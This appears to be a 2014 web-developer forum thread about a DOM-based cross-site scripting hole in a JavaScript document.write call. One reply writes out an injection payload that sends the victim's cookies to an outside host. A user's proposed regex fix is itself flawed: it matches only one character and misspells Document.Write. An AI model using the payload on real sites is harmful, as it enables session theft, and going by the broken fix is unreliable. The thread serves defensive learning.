I am not very familiar with DOM-Based Cross-Site Scripting but have been informed that the following lines of code (taken from a .js file) below are leaving my site vulnerable:
and your page is now giving me your cookies, letting me log in as you, or access the site as you, or get some kind of info from you. Or I could redirect it off to my phishing page or make you go to a site that exploits a vulnerability, or anything really.
I'm afraid I no longer use this forum due to the new point allocation system.
Although using regexp to restrict the valid values to letters and numbers looks good to me (maybe you could add a length check), taking
anything from the URL and rendering it directly into the page gives me a bad feeling. There are so many ways to do XSS:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
I'm not sure there isn't a way to inject malicious content with only letters and numbers.
György
György Balássy
Microsoft Regional Director, ASP.NET/IIS MVP and ASPInsider
http://gyorgybalassy.wordpress.com
polymorphic
Member
39 Points
73 Posts
DOM-Based Cross-Site Scripting
Feb 12, 2014 06:32 PM|polymorphic|LINK
I am not very familiar with DOM-Based Cross-Site Scripting but have been informed that the following lines of code (taken from a .js file) below are leaving my site vulnerable:
document.write("<PARAM NAME=FlashyVars VALUE='" + strFlashyVars + "'>");Does anyone know how this could be manipulated or remedied?
Thanks,
cj
cj
AidyF
All-Star
37441 Points
9079 Posts
Re: DOM-Based Cross-Site Scripting
Feb 12, 2014 06:48 PM|AidyF|LINK
It depends where strFlashyVars comes from. If I can change it to
'/><script>document.getElementById('someimage').src = 'http://mysite.com/?c=' + document.cookies + ';</script><p></p '
then what gets written to your page is
<PARAM NAME=FlashyVars VALUE=''/><script>document.getElementById('someimage').src = 'http://mysite.com/?c=' + document.cookies + ';</script><p></p ''>
and your page is now giving me your cookies, letting me log in as you, or access the site as you, or get some kind of info from you. Or I could redirect it off to my phishing page or make you go to a site that exploits a vulnerability, or anything really.
polymorphic
Member
39 Points
73 Posts
Re: DOM-Based Cross-Site Scripting
Feb 13, 2014 09:44 AM|polymorphic|LINK
That is interesting, thanks. It is being called from some .html pages. Sometimes an empty string is being passed int, sometimes values.
What is the remedy for this type of vulnerability?
cj
polymorphic
Member
39 Points
73 Posts
Re: DOM-Based Cross-Site Scripting
Feb 13, 2014 10:02 AM|polymorphic|LINK
This is an informative article : https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet
However, I am still not sure how to prevent the attack since the .js file resides on the client.
cj
polymorphic
Member
39 Points
73 Posts
Re: DOM-Based Cross-Site Scripting
Feb 14, 2014 08:49 AM|polymorphic|LINK
I think I have found a work-around as this page needs other updating.
However, something along this line might be helpful to some scenarios:
var pos = document.URL.indexOf("name=") + 5; var name = document.URL.substring(pos, document.URL.length); if (name.match(/^[a-zA-Z0-9]$/)) { Document.Write(strFlashyVars); } else { window.alert("Security error"); }cj
balassy
Member
80 Points
22 Posts
ASPInsiders
MVP
Re: DOM-Based Cross-Site Scripting
Feb 22, 2014 04:35 AM|balassy|LINK
Although using regexp to restrict the valid values to letters and numbers looks good to me (maybe you could add a length check), taking anything from the URL and rendering it directly into the page gives me a bad feeling. There are so many ways to do XSS: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
I'm not sure there isn't a way to inject malicious content with only letters and numbers.
György
Microsoft Regional Director, ASP.NET/IIS MVP and ASPInsider
http://gyorgybalassy.wordpress.com